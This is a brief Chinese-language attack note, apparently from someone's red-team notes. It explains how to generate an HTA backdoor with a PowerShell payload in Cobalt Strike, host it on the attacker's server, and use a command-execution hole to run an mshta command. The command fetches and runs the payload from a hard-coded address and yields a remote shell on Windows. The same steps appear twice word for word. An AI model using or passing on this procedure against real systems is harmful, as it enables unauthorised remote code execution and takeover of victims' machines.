设置监听
生成http application后门 选择powershell脚本
然后把生成的evil.hta文件上传到cs服务器上
这时已经挂在cs服务器/download目录下
如果有命令执行漏洞,执行mshta+刚才生成的路径
mshta http://192.168.17.181:80/download/file.ext
然后就获得一个shell,只适用win
设置监听
生成http application后门 选择powershell脚本
然后把生成的evil.hta文件上传到cs服务器上
这时已经挂在cs服务器/download目录下
如果有命令执行漏洞,执行mshta+刚才生成的路径
mshta http://192.168.17.181:80/download/file.ext
然后就获得一个shell,只适用win